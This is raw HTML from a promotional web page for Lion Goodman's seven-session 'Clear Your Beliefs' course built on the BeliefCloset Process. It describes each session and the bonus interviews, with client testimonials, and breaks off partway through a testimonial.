src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a 